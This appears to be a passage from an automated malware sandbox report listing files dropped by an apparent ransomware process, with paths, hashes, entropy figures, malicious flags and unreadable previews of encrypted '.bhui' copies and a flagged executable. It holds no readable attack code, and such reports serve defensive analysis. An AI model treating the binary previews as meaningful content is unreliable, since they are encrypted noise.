Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875911995769513
Encrypted:	false
SSDEEP:	24:9BB325JeFYl8WlqrqM8rCFTUmfAgEu/j8M1zQG8uwtsE0jiKnWHWbD:9BY5Co8Wl+8rC1UmoM/j3oftsE0jDnWw
MD5:	EBB920B4F84F5FB50155EA81C5076E81
SHA1:	1F8E2992DB9E50E0CA25E1312CA98E46FBF90F5F
SHA-256:	160B539632AC9B6F5BE9AF82E39A5C82149059F0CD27F93E50EA16FA6AD5826B
SHA-512:	72E54EA209960A91A40F343832117C7CE1A1ABBAA48B505A681223D92E308161BEBD9C6E913E3EA52D39D7ECD02C9AA6918D91D74FA2DFE9D47EAFBA64A4CFD6
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ..Q...M...L..C...P....W&.%..O.]1..4g]x.3.9!.p.....A;.....9._..rZ....2 .....R....bw..c...xsb...(......m...:..\|&gl\.6=.c7..KK".....Fve2......v..?f..........>..L.i...F....pg..a..Ii..;`....(GXh...K.Sc.bz....]..p.xj+.&....UW.....).m..C.{,}D.....V!o.G....#.E....s...gZY..KYn..+`v.&..(.U.^8J.{....<.s......-..d..Hy..l....\|.UyIn....+.+...7.<........?x....bq.....>-;..n....t1.oE..........m6.UG~..UT......K.DW........F....0.....n.m>..k...-qh_...a.....). .Hf....../.....B........... .......cN.).M..}.}...;..s..h..f...E..h...{...lNb.x.\|-........M.BhK......2.o..`=.KO.%.&..XH...Ou/.g.......G{ &N@..f{?h...V-`.v..dM5.5.i.{.Es...U nC...B....t...n....k....2.....i.+..$.r(...z.seHk....s.A.. .9...:......}2A.rP.S...q.......i\..4.......n...S...9.2..r.....>$.K.../}6o..Y..R..N..1 c...65...."....9...$#...u..@.......%^.fY....i../..0.1]...U. 5.>..}4..=.I.L,^/.L<....TI.4b....;k..A.+r.,..&..lp.....^.lf..:...U%...O..3{.>....v.....n.....B.L.FdXr.....`.n....1..=..

C:\Users\user\Documents\ZIPXYXWIOY\LHEPQPGEWF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875911995769513
Encrypted:	false
SSDEEP:	24:9BB325JeFYl8WlqrqM8rCFTUmfAgEu/j8M1zQG8uwtsE0jiKnWHWbD:9BY5Co8Wl+8rC1UmoM/j3oftsE0jDnWw
MD5:	EBB920B4F84F5FB50155EA81C5076E81
SHA1:	1F8E2992DB9E50E0CA25E1312CA98E46FBF90F5F
SHA-256:	160B539632AC9B6F5BE9AF82E39A5C82149059F0CD27F93E50EA16FA6AD5826B
SHA-512:	72E54EA209960A91A40F343832117C7CE1A1ABBAA48B505A681223D92E308161BEBD9C6E913E3EA52D39D7ECD02C9AA6918D91D74FA2DFE9D47EAFBA64A4CFD6
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ..Q...M...L..C...P....W&.%..O.]1..4g]x.3.9!.p.....A;.....9._..rZ....2 .....R....bw..c...xsb...(......m...:..\|&gl\.6=.c7..KK".....Fve2......v..?f..........>..L.i...F....pg..a..Ii..;`....(GXh...K.Sc.bz....]..p.xj+.&....UW.....).m..C.{,}D.....V!o.G....#.E....s...gZY..KYn..+`v.&..(.U.^8J.{....<.s......-..d..Hy..l....\|.UyIn....+.+...7.<........?x....bq.....>-;..n....t1.oE..........m6.UG~..UT......K.DW........F....0.....n.m>..k...-qh_...a.....). .Hf....../.....B........... .......cN.).M..}.}...;..s..h..f...E..h...{...lNb.x.\|-........M.BhK......2.o..`=.KO.%.&..XH...Ou/.g.......G{ &N@..f{?h...V-`.v..dM5.5.i.{.Es...U nC...B....t...n....k....2.....i.+..$.r(...z.seHk....s.A.. .9...:......}2A.rP.S...q.......i\..4.......n...S...9.2..r.....>$.K.../}6o..Y..R..N..1 c...65...."....9...$#...u..@.......%^.fY....i../..0.1]...U. 5.>..}4..=.I.L,^/.L<....TI.4b....;k..A.+r.,..&..lp.....^.lf..:...U%...O..3{.>....v.....n.....B.L.FdXr.....`.n....1..=..

C:\Users\user\Documents\ZIPXYXWIOY\LIJDSFKJZG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844494893366813
Encrypted:	false
SSDEEP:	24:cmypKRD8thZp3MR4O1X8oFNtx97r2AlrOUK4x6FZ0bvrBsFa096RhWWbD:cj3F3eP8ohx97r2A8hdb0xP00HzD
MD5:	5F4B61294D07650F65597A37F90D74DD
SHA1:	3CEAD0F3BFDAB23009A1DD798B247D8301862F12
SHA-256:	0F2D7E2C24C819E76420DCEDFC006EA9710D0573E041329BE312D2B4D6D16701
SHA-512:	C6C561EEC03E986D892F8096FF7582B11DF14E6762BD77530AD0535486B31AF0342FD5E064AAAD506B717B55E416AA365FBEF690C151104219B2D6A3607AB4B9
Malicious:	false
Reputation:	unknown
Preview:	LIJDS'H=.<_......z..I4.A.].c......l4....=...H.........NA.....:....L...t9E........5.#.$.+p_.....A..d...2b...^#.6.4E2.tX.....I..N..y.C0..1....z......."O....n7C.....=l.Y......_7u.g..[\|$j.3.9....7.n.z..'..".j....5k.h.+F...)...f?.-.I.......u..:...[\l..R...Y.N...S.zh9...R....G8.........H.\|..W.Rm..".......f+S25F6..F.M........EB....I..Ok.'.0....z....X.............p.\...0.........:...".e.t..-.....]..g....1.HkW..P...#l..\^\..D`T.......X..X.h.-s.K..$HC,.s.......J......V...$g....Q..G.R:;..Y...'.$.k.W..<.f.:X.s......./e....3.....[.......%.I........$.Z.@..Y}m..C..U<?)......-.x.T.,...Z.&....0_{....D..9l.q>u..NDp`."..D...4.../.. .U......n...T...3Z.4..e..9..........8.}........>..._.j.V....4.v.4t.R....>eS:..:.u.....\k.t>.....e=..Q.s.."s.s.......x@I.&I..%.......Dx..3.s..;.....3$.5..)D..{..W...E5.U.7......G.r..=...j.<.....w....9^}....r...u.)..H......>....>{B.E$t.h..<..(m....M.3.,t.b..>dz.L.D..9....D...........?dd.ooc...e.$....,~...#]n.-+;-...v.

C:\Users\user\Documents\ZIPXYXWIOY\LIJDSFKJZG.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844494893366813
Encrypted:	false
SSDEEP:	24:cmypKRD8thZp3MR4O1X8oFNtx97r2AlrOUK4x6FZ0bvrBsFa096RhWWbD:cj3F3eP8ohx97r2A8hdb0xP00HzD
MD5:	5F4B61294D07650F65597A37F90D74DD
SHA1:	3CEAD0F3BFDAB23009A1DD798B247D8301862F12
SHA-256:	0F2D7E2C24C819E76420DCEDFC006EA9710D0573E041329BE312D2B4D6D16701
SHA-512:	C6C561EEC03E986D892F8096FF7582B11DF14E6762BD77530AD0535486B31AF0342FD5E064AAAD506B717B55E416AA365FBEF690C151104219B2D6A3607AB4B9
Malicious:	false
Reputation:	unknown
Preview:	LIJDS'H=.<_......z..I4.A.].c......l4....=...H.........NA.....:....L...t9E........5.#.$.+p_.....A..d...2b...^#.6.4E2.tX.....I..N..y.C0..1....z......."O....n7C.....=l.Y......_7u.g..[\|$j.3.9....7.n.z..'..".j....5k.h.+F...)...f?.-.I.......u..:...[\l..R...Y.N...S.zh9...R....G8.........H.\|..W.Rm..".......f+S25F6..F.M........EB....I..Ok.'.0....z....X.............p.\...0.........:...".e.t..-.....]..g....1.HkW..P...#l..\^\..D`T.......X..X.h.-s.K..$HC,.s.......J......V...$g....Q..G.R:;..Y...'.$.k.W..<.f.:X.s......./e....3.....[.......%.I........$.Z.@..Y}m..C..U<?)......-.x.T.,...Z.&....0_{....D..9l.q>u..NDp`."..D...4.../.. .U......n...T...3Z.4..e..9..........8.}........>..._.j.V....4.v.4t.R....>eS:..:.u.....\k.t>.....e=..Q.s.."s.s.......x@I.&I..%.......Dx..3.s..;.....3$.5..)D..{..W...E5.U.7......G.r..=...j.<.....w....9^}....r...u.)..H......>....>{B.E$t.h..<..(m....M.3.,t.b..>dz.L.D..9....D...........?dd.ooc...e.$....,~...#]n.-+;-...v.

C:\Users\user\Documents\ZIPXYXWIOY\SNIPGPPREP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835649187223787
Encrypted:	false
SSDEEP:	24:CkdyqAGol7St98olKfy5g2C6P9WngGvDr1K9rsgPdWbD:1wlWQWKe9qjnybKD
MD5:	4DC4C18C28D14482CB7D95D0C57E2F99
SHA1:	400FFD4276DAF858CEA6428A01668CBEC3A37EFE
SHA-256:	6A39DC00B204E625E560A4226640759A4D4ABFDB0E3B0747C382403967143376
SHA-512:	62504C05CBC743F7FFAF05AB25D4912FA4CB228E4E104E7D949725A18833571A75DAE35C0896631A60FAEB2233E4F2F9660604A0376DC83C2C596D5498975BA2
Malicious:	false
Reputation:	unknown
Preview:	SNIPG1_.{..(..r...+..i..F.g...d.#..=..&R.N...TL?.5.....f...W....H.&.H.c.)....YX.p.8].R(.T{.....A.I.f:..}i......D..$.~...i.}-y.6l.......d..@.g.ps..8T.T.v9..$....B......q4.<#R...b.....6.rI..1a'...7..&4=.>y...!..\V.?.X..&.. \..g......t.X6....b..........E0N[...."..P......4A..!r.Ob"^.q...?iT.NPI..>(q..._..b..B..=.(.j.!.4...i.......P.'.V!!...$d.G1.v.nht..U^f>-..zG..J..i...W.+L.{..!9.P.a...f..X...b.F..`N.us..R....v;......-...... .q...\|{e.7O..r.7.........+q..=...&...~..K........6H.J..?<..Y.L7......y.j.vm.z.HlP....M....?YD.OQ.$Y@}.w\r.Y. ...r..../..r.4....(.pZ2J...G....e.....;v/.-`...C...[.7.....'..JN..;....j..b..R..Ok.p....Q6......H."p.....<r..u.....i..4..A."...Dgs...c..........U4..I7.'m./...&...]....8.h..)...G.K.r...G....jG.4U.?.R..\.Y'..9..8U.azS]goM.r.....&..,.....&........7gE....`X/..y..p....+..N..E...."..%].CS...s../.g...]...5...E.w...0..-.h..........ZE..0...d..{M.=.L..1Ytn.C&....[..@..tB-3.....s...w........5.R.~. ....{0#.....c...

C:\Users\user\Documents\ZIPXYXWIOY\SNIPGPPREP.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835649187223787
Encrypted:	false
SSDEEP:	24:CkdyqAGol7St98olKfy5g2C6P9WngGvDr1K9rsgPdWbD:1wlWQWKe9qjnybKD
MD5:	4DC4C18C28D14482CB7D95D0C57E2F99
SHA1:	400FFD4276DAF858CEA6428A01668CBEC3A37EFE
SHA-256:	6A39DC00B204E625E560A4226640759A4D4ABFDB0E3B0747C382403967143376
SHA-512:	62504C05CBC743F7FFAF05AB25D4912FA4CB228E4E104E7D949725A18833571A75DAE35C0896631A60FAEB2233E4F2F9660604A0376DC83C2C596D5498975BA2
Malicious:	false
Reputation:	unknown
Preview:	SNIPG1_.{..(..r...+..i..F.g...d.#..=..&R.N...TL?.5.....f...W....H.&.H.c.)....YX.p.8].R(.T{.....A.I.f:..}i......D..$.~...i.}-y.6l.......d..@.g.ps..8T.T.v9..$....B......q4.<#R...b.....6.rI..1a'...7..&4=.>y...!..\V.?.X..&.. \..g......t.X6....b..........E0N[...."..P......4A..!r.Ob"^.q...?iT.NPI..>(q..._..b..B..=.(.j.!.4...i.......P.'.V!!...$d.G1.v.nht..U^f>-..zG..J..i...W.+L.{..!9.P.a...f..X...b.F..`N.us..R....v;......-...... .q...\|{e.7O..r.7.........+q..=...&...~..K........6H.J..?<..Y.L7......y.j.vm.z.HlP....M....?YD.OQ.$Y@}.w\r.Y. ...r..../..r.4....(.pZ2J...G....e.....;v/.-`...C...[.7.....'..JN..;....j..b..R..Ok.p....Q6......H."p.....<r..u.....i..4..A."...Dgs...c..........U4..I7.'m./...&...]....8.h..)...G.K.r...G....jG.4U.?.R..\.Y'..9..8U.azS]goM.r.....&..,.....&........7gE....`X/..y..p....+..N..E...."..%].CS...s../.g...]...5...E.w...0..-.h..........ZE..0...d..{M.=.L..1Ytn.C&....[..@..tB-3.....s...w........5.R.~. ....{0#.....c...

C:\Users\user\Documents\ZIPXYXWIOY\VWDFPKGDUF.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845989316098398
Encrypted:	false
SSDEEP:	24:G0XCx926ofScTK/kyHStnlm+KDi+haaEr4rMDyoivAJ7lBXE/4RHtXrWbD:Q96fXu/kyklm+a03yoiYJ7IQ9tX4D
MD5:	79EEE4163660A04A4EB76A151E0C9A9F
SHA1:	BE525DE07A473C8087AF82C78847710BC058401B
SHA-256:	FDBDC842DE75994D76AA2736093CD36D5E50B3FE5B565B0999E904C82E1BE584
SHA-512:	03D6CCF63CA7D225FF3DB8F4A326A22A1E6A16E0F17E24442B85E9740A090051B721765E8DA42373B7C69C7EA1372343A41B0DAFAF1D5AF7ACDC9C1EFEFADF31
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.3W....;.....f(...~...bx.J5....g.k_..6.....eC/..O./F.......@...w.n3]...._;QI.f.={.:?....P.R.)r..@K.P.V..C.T[.eM'...re4&..b6....Z..G;.>...o.J....H.)."H[...T.'...=l........a.w..\..$..(p..U.T..H....H...c......ts.g.;K..f.?.<.......w.\...z...]]0c...!.\|.{....?.1.au.s...,'2DA:.P.V.G=......>......jb.d.S.g.-...</.l.a..........2=.X...I.82......$.B..'.\|...]2.,:...O...Y.mx.!......D.k_..V=.......(.....S..D.....:.y_.<..k........;.-.>l.q;~.. D....n.c....0.80>R......m*8...~Mk:..`.4.:G...O..an[...8..i.C.......3....Z..WM..q.....b;.."4......5..,...!+..i'k........@y..\..k'.^$..z$.......e..u.@}>...t?.=Hc.3.....(W..,......)...bX......B].].':..tJ.I.m...a..........(HN./....%.b.....M.wa.3....>..>w.eL.)..g....2...zCa...h.;=0...".k..j~0..ue.f.."/z.RV.oE.].Qb....o..........mM.:..N.z\.xAQ....Ih-......xc..d1$...0.B....&M..wo...OFn\....iNi.....\..kU...#d}.-Y7...u;xm...c...?.A.tD.h]..!P..Q.K...fI..wAE...i~k.P.....\|Y:.]l........(k.I<....]%.:\|e._.]..?QF..g.Y....9s.

C:\Users\user\Documents\ZIPXYXWIOY\VWDFPKGDUF.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845989316098398
Encrypted:	false
SSDEEP:	24:G0XCx926ofScTK/kyHStnlm+KDi+haaEr4rMDyoivAJ7lBXE/4RHtXrWbD:Q96fXu/kyklm+a03yoiYJ7IQ9tX4D
MD5:	79EEE4163660A04A4EB76A151E0C9A9F
SHA1:	BE525DE07A473C8087AF82C78847710BC058401B
SHA-256:	FDBDC842DE75994D76AA2736093CD36D5E50B3FE5B565B0999E904C82E1BE584
SHA-512:	03D6CCF63CA7D225FF3DB8F4A326A22A1E6A16E0F17E24442B85E9740A090051B721765E8DA42373B7C69C7EA1372343A41B0DAFAF1D5AF7ACDC9C1EFEFADF31
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.3W....;.....f(...~...bx.J5....g.k_..6.....eC/..O./F.......@...w.n3]...._;QI.f.={.:?....P.R.)r..@K.P.V..C.T[.eM'...re4&..b6....Z..G;.>...o.J....H.)."H[...T.'...=l........a.w..\..$..(p..U.T..H....H...c......ts.g.;K..f.?.<.......w.\...z...]]0c...!.\|.{....?.1.au.s...,'2DA:.P.V.G=......>......jb.d.S.g.-...</.l.a..........2=.X...I.82......$.B..'.\|...]2.,:...O...Y.mx.!......D.k_..V=.......(.....S..D.....:.y_.<..k........;.-.>l.q;~.. D....n.c....0.80>R......m*8...~Mk:..`.4.:G...O..an[...8..i.C.......3....Z..WM..q.....b;.."4......5..,...!+..i'k........@y..\..k'.^$..z$.......e..u.@}>...t?.=Hc.3.....(W..,......)...bX......B].].':..tJ.I.m...a..........(HN./....%.b.....M.wa.3....>..>w.eL.)..g....2...zCa...h.;=0...".k..j~0..ue.f.."/z.RV.oE.].Qb....o..........mM.:..N.z\.xAQ....Ih-......xc..d1$...0.B....&M..wo...OFn\....iNi.....\..kU...#d}.-Y7...u;xm...c...?.A.tD.h]..!P..Q.K...fI..wAE...i~k.P.....\|Y:.]l........(k.I<....]%.:\|e._.]..?QF..g.Y....9s.

C:\Users\user\Documents\ZIPXYXWIOY\ZIPXYXWIOY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849701449002554
Encrypted:	false
SSDEEP:	24:LE/cYVlyZ278ni+iit2v7WRozkQGG0PBm0B4bmIP+HKgtn4w4t1WbD:LHYVllJkt2D4Gim0BJI7i4P0D
MD5:	59FAEEE5517F022552E7B917BAB9FFAD
SHA1:	613FC24522E21162FA11AFC728C583F7B2BC09FF
SHA-256:	1103DB1437183E59FBE482F0063CEF49E23224068BCAB7D0B73A56A83EEB9541
SHA-512:	E6C44FE85DAD3310598E4FDB301324F8E5D9B61F4318014775A725E7F0E0B46C3A829031CF4DF4DFEBC4E9F28086C68863844770E1061530E7D11539176261B0
Malicious:	false
Reputation:	unknown
Preview:	ZIPXYS.......AQY.h.ow.....w..q.FE..`w..m.JV...D[.A.A.Z..y:.Z....cOP.Y....5..>Y.......8q`f?W.._?..1b...P..<.....X..+..?...wI?.<5..=..y.........5F3..mj[o^+.S..^..k...>.O.&OB...u@...[#.r..>.oJ.....U.x...5....../..x}...:O.{.\|..D...7.......C..Sl..1S.E.X[.B........h..PAM....t-...}iY..+.ke!5..N,+.o..i....i..\|TN.......T..a.6.3..H...z..'..1.y....4.!t..s......;..g.36SD....@....,G&M..y:D6.../u....G8.....Ng.3.v.^.I.......X_P4s.D...G..v...O.vBr.5#.......\ca...!.,. .G.N.p....2.A3...Q...X..:e..g.W.u...../F....}.?<....G7.;.".S.0...AK..M7.;TDE.'.b};.....U'...\H.W.CJ).fRA.o..V....u.V..d..A.b...Z.@E...(.2.xc."..[.#..Xk.....]b.E.........Z..(Gt.R>x..Z.t..~)Y,s..r..i=...../.......1.8.[...\|.x..!y..Y.c..?.?z.P.....]...D.).`.....V..N.....Q.....I.+.Xy..s.7.=.,..+c..p.b..F._.E......N.20..,F.$7.......;\|...M..W..........[s.U.s.....c.............EH.k..V..a..\.``..5N.w.E+.-....w4.CW"YQql......`)F.;:.....9...N}....c.A..5h...#.\.1.#yO.....8M.E.\|.l..S...i..w.a'.h.b..(s`...D.....x

C:\Users\user\Documents\ZIPXYXWIOY\ZIPXYXWIOY.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849701449002554
Encrypted:	false
SSDEEP:	24:LE/cYVlyZ278ni+iit2v7WRozkQGG0PBm0B4bmIP+HKgtn4w4t1WbD:LHYVllJkt2D4Gim0BJI7i4P0D
MD5:	59FAEEE5517F022552E7B917BAB9FFAD
SHA1:	613FC24522E21162FA11AFC728C583F7B2BC09FF
SHA-256:	1103DB1437183E59FBE482F0063CEF49E23224068BCAB7D0B73A56A83EEB9541
SHA-512:	E6C44FE85DAD3310598E4FDB301324F8E5D9B61F4318014775A725E7F0E0B46C3A829031CF4DF4DFEBC4E9F28086C68863844770E1061530E7D11539176261B0
Malicious:	false
Reputation:	unknown
Preview:	ZIPXYS.......AQY.h.ow.....w..q.FE..`w..m.JV...D[.A.A.Z..y:.Z....cOP.Y....5..>Y.......8q`f?W.._?..1b...P..<.....X..+..?...wI?.<5..=..y.........5F3..mj[o^+.S..^..k...>.O.&OB...u@...[#.r..>.oJ.....U.x...5....../..x}...:O.{.\|..D...7.......C..Sl..1S.E.X[.B........h..PAM....t-...}iY..+.ke!5..N,+.o..i....i..\|TN.......T..a.6.3..H...z..'..1.y....4.!t..s......;..g.36SD....@....,G&M..y:D6.../u....G8.....Ng.3.v.^.I.......X_P4s.D...G..v...O.vBr.5#.......\ca...!.,. .G.N.p....2.A3...Q...X..:e..g.W.u...../F....}.?<....G7.;.".S.0...AK..M7.;TDE.'.b};.....U'...\H.W.CJ).fRA.o..V....u.V..d..A.b...Z.@E...(.2.xc."..[.#..Xk.....]b.E.........Z..(Gt.R>x..Z.t..~)Y,s..r..i=...../.......1.8.[...\|.x..!y..Y.c..?.?z.P.....]...D.).`.....V..N.....Q.....I.+.Xy..s.7.=.,..+c..p.b..F._.E......N.20..,F.$7.......;\|...M..W..........[s.U.s.....c.............EH.k..V..a..\.``..5N.w.E+.-....w4.CW"YQql......`)F.;:.....9...N}....c.A..5h...#.\.1.#yO.....8M.E.\|.l..S...i..w.a'.h.b..(s`...D.....x

C:\Users\user\Downloads\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866035570835601
Encrypted:	false
SSDEEP:	24:r1y0GOvwZ0ewIwgrFJAfybQjaeKScMVkEJ3nM8Iejhlq8nv0YvIycrtchs0IEgWT:r1y0GF/wIpBJ4wHVScMia3BVIYvTAdt2
MD5:	70B8B9F286012B11E748C3C9E4B14640
SHA1:	1FB6E51794495A601367D0E2EAEB3B44D66B90F4
SHA-256:	322E302F52F209616AD08F8F03727EFA5F088F9761B3627907723FDECBB1E1FE
SHA-512:	B5F3BB42508F4ECA918FEE6C5C2273E9EC21FD42611A6EDA52C8812E552C7A8A1BCE8990F8BD5FDF32FB68180C8C155406376F37D439A1B1A5F2D2066859717B
Malicious:	false
Reputation:	unknown
Preview:	CZQKS.#...=-r..l.l..x.</:..b..(;h..[u&18[ .x!..4.59~..}..yOY.f...>...W..p....Fn...%...p.....3Z4.&4.9NS......m.S..........iMu....].+J..\Nn.M..../.......6..c....%..H..0R.8..O..$...-..&)\.!.ZO.;..u.]..0...(D.....k....M?..F,.N.Z.$m6.....dF..\.....T..O...~ 3[B...p.BU.n..1.z.o.c.....GG..uw..W.{..z.A.A.a.H...f&.!.....Q.+I..x.Vf.YzH.H..\[.h7....[W...k.%&7.O.!.'#.?.F.v..d...@..+2....O...e ".#.vU.[8....l.Z,....e../}d.1......N`C,.=8...N..).......R>....`TK?.z....1?@.Sgo.{.I :P...Ks.....]..5.!.xQ../.8...vb\|9..c...0....~.T[.],.....W..b....u...?.*9.;wZ....\|v.N.....M.!..t.E....X.2m.7Z.c....f...@...<z...x...Y.-...5....."....-...D.....$o...R.FxQ.q.8..Y...\|...l$....](O..aE...Lf#.o.Q..F."..;^..q....C.w...0]....J..s.......C\|.Y..+..".u.Fe~r....CR.[..^..-.D.....:>...#3...r.=3C........2..}9Q........)..2k...+k8..u..X.....0R%D.v..e.%A.....~.q..pZ&)f..........a.l..9.....y.-.c".....b.t..f.G...P...\|..A..Q(V.=.Z....Ry9..n....3#.YQL.V..R.Zh..2.,.6f..n...

C:\Users\user\Downloads\CZQKSDDMWR.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866035570835601
Encrypted:	false
SSDEEP:	24:r1y0GOvwZ0ewIwgrFJAfybQjaeKScMVkEJ3nM8Iejhlq8nv0YvIycrtchs0IEgWT:r1y0GF/wIpBJ4wHVScMia3BVIYvTAdt2
MD5:	70B8B9F286012B11E748C3C9E4B14640
SHA1:	1FB6E51794495A601367D0E2EAEB3B44D66B90F4
SHA-256:	322E302F52F209616AD08F8F03727EFA5F088F9761B3627907723FDECBB1E1FE
SHA-512:	B5F3BB42508F4ECA918FEE6C5C2273E9EC21FD42611A6EDA52C8812E552C7A8A1BCE8990F8BD5FDF32FB68180C8C155406376F37D439A1B1A5F2D2066859717B
Malicious:	false
Reputation:	unknown
Preview:	CZQKS.#...=-r..l.l..x.</:..b..(;h..[u&18[ .x!..4.59~..}..yOY.f...>...W..p....Fn...%...p.....3Z4.&4.9NS......m.S..........iMu....].+J..\Nn.M..../.......6..c....%..H..0R.8..O..$...-..&)\.!.ZO.;..u.]..0...(D.....k....M?..F,.N.Z.$m6.....dF..\.....T..O...~ 3[B...p.BU.n..1.z.o.c.....GG..uw..W.{..z.A.A.a.H...f&.!.....Q.+I..x.Vf.YzH.H..\[.h7....[W...k.%&7.O.!.'#.?.F.v..d...@..+2....O...e ".#.vU.[8....l.Z,....e../}d.1......N`C,.=8...N..).......R>....`TK?.z....1?@.Sgo.{.I :P...Ks.....]..5.!.xQ../.8...vb\|9..c...0....~.T[.],.....W..b....u...?.*9.;wZ....\|v.N.....M.!..t.E....X.2m.7Z.c....f...@...<z...x...Y.-...5....."....-...D.....$o...R.FxQ.q.8..Y...\|...l$....](O..aE...Lf#.o.Q..F."..;^..q....C.w...0]....J..s.......C\|.Y..+..".u.Fe~r....CR.[..^..-.D.....:>...#3...r.=3C........2..}9Q........)..2k...+k8..u..X.....0R%D.v..e.%A.....~.q..pZ&)f..........a.l..9.....y.-.c".....b.t..f.G...P...\|..A..Q(V.=.Z....Ry9..n....3#.YQL.V..R.Zh..2.,.6f..n...

C:\Users\user\Downloads\ChromeSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	1414934
Entropy (8bit):	7.980020497920448
Encrypted:	false
SSDEEP:	24576:DvB1FBgDXZNFfZoWe0KVIC9ClKa5IrykTHhQ5NoRyftZZriXWzr6pfKuIU:DJ1rgXteP3Vz9oI2mhoNosVDP+fXb
MD5:	6B6BA73219E7B3E2F8928995211A8045
SHA1:	622008E27587BF2C2B6B0EBCECFD09ADD1671C99
SHA-256:	B5C7618F170C0E1F582FA19BC3033FE203FB2AC699CD16124EFDBF9F0A12929A
SHA-512:	08CE9FEF19BDD21BF853E6774F6150124CDEB35E8D962308A1C2A6DB2F43DFC1B83652EE3E91064B51DB363D3F530D7BACA0449D5DEAD1780EDF23B108C3E9AA
Malicious:	true
Reputation:	unknown
Preview:	MZ....>.&..G.@.+V.............s9#T.]>.>Nx.j......q]......=O.....Zw.Jcli.y..F..%.>..X{.6..v9..w.t.....)..9.._..Mg.M'A.u/...6....y.o]4....<9.... ...4.....kuqf....3.....:dgu.k...\|z\|J.....^@.;..o..h.>......]a....[..{.....D=u.7=..6...U........f....d5.../.b?H"L.k..q...!B...N..x..%.."..h.6A..=.+O.....w.J.tZ.~..YY.....V..._...i.>..0G.u...).;.#..p....Axyr.....S_a.m.z.9~N.....(.C.7....L.....T:..P7h'.t.gU.Y:rR.evi/.....%......j....y.:.L"s...,r.....K... ..Zj!\|.;.h.w4....?.n.2^.M.... .....S.I..C.a.._.Y......o.........u...Q\|p J.{L9.K.]...C...&d..ke..Y.r.n....;(...6Y...q.,;...;=.mjG.../).. ....L,m$..?...\|8......E.4z...'....g........g.....Q.Q\|D..tx+..O...b.&..P.SH.+J.P..>...{;.`.2...$...=..#..........E.J~DI0....`,..~).4....Z.L..k_..............W.....M(.n......yt.`....!.\|.P..........6.z.Z..Ex.k.=.W.../j.z...N.v'..n...V...;y.....eN.4....s....">MG..f>....D..s..].w.h..b.V....I`..._......c........?.....L.g.f.=..6.......@...S.Ak..E.<.....&~......O.......

C:\Users\user\Downloads\ChromeSetup.exe.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	1414934
Entropy (8bit):	7.980020497920448
Encrypted:	false
SSDEEP:	24576:DvB1FBgDXZNFfZoWe0KVIC9ClKa5IrykTHhQ5NoRyftZZriXWzr6pfKuIU:DJ1rgXteP3Vz9oI2mhoNosVDP+fXb
MD5:	6B6BA73219E7B3E2F8928995211A8045
SHA1:	622008E27587BF2C2B6B0EBCECFD09ADD1671C99
SHA-256:	B5C7618F170C0E1F582FA19BC3033FE203FB2AC699CD16124EFDBF9F0A12929A
SHA-512:	08CE9FEF19BDD21BF853E6774F6150124CDEB35E8D962308A1C2A6DB2F43DFC1B83652EE3E91064B51DB363D3F530D7BACA0449D5DEAD1780EDF23B108C3E9AA
Malicious:	true
Reputation:	unknown
Preview:	MZ....>.&..G.@.+V.............s9#T.]>.>Nx.j......q]......=O.....Zw.Jcli.y..F..%.>..X{.6..v9..w.t.....)..9.._..Mg.M'A.u/...6....y.o]4....<9.... ...4.....kuqf....3.....:dgu.k...\|z\|J.....^@.;..o..h.>......]a....[..{.....D=u.7=..6...U........f....d5.../.b?H"L.k..q...!B...N..x..%.."..h.6A..=.+O.....w.J.tZ.~..YY.....V..._...i.>..0G.u...).;.#..p....Axyr.....S_a.m.z.9~N.....(.C.7....L.....T:..P7h'.t.gU.Y:rR.evi/.....%......j....y.:.L"s...,r.....K... ..Zj!\|.;.h.w4....?.n.2^.M.... .....S.I..C.a.._.Y......o.........u...Q\|p J.{L9.K.]...C...&d..ke..Y.r.n....;(...6Y...q.,;...;=.mjG.../).. ....L,m$..?...\|8......E.4z...'....g........g.....Q.Q\|D..tx+..O...b.&..P.SH.+J.P..>...{;.`.2...$...=..#..........E.J~DI0....`,..~).4....Z.L..k_..............W.....M(.n......yt.`....!.\|.P..........6.z.Z..Ex.k.=.W.../j.z...N.v'..n...V...;y.....eN.4....s....">MG..f>....D..s..].w.h..b.V....I`..._......c........?.....L.g.f.=..6.......@...S.Ak..E.<.....&~......O.......

C:\Users\user\Downloads\GLTYDMDUST.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
